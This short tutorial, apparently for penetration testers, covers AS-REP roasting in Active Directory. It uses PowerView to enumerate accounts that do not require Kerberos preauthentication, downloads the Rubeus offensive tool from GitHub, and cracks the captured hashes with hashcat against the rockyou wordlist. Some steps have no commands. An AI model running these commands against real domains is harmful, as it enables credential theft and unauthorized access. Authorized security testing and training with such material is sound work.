Disclaimer: This material is provided for educational purposes and authorized security testing only.
You are solely responsible for how
you use the information. Do not use these techniques on systems without explicit permission from the owner.
We
do not encourage any kind of illegal or harmful activity
Using PowerView to Enumerate Accounts
-
Import the PowerView module:
Import-Module .\PowerView.ps1
-
Find users with the "Do not require Kerberos preauthentication" flag:
Get-DomainUser -PreAuthNotRequired
-
Request AS-REP for targeted users.Once you have identified vulnerable accounts, request the AS-REP.
-
Download Rubeus from the GitHub releases page:
Invoke-WebRequest -Uri "https://github.com/GhostPack/Rubeus/releases/download/v1.5.0/Rubeus.zip" -OutFile "Rubeus.zip"
-
Unzip the downloaded file to a directory of your choice:
Expand-Archive -Path "Rubeus.zip" -DestinationPath ".\Rubeus"
-
Request AS-REP hashes with Rubeus:
-
Save the AS-REP hashes to a file:
-
Crack the AS-REP hashes using Hashcat with a wordlist (e.g., rockyou.txt
):
hashcat -m 18200 -a 0 asrep_hashes.txt /usr/share/wordlists/rockyou.txt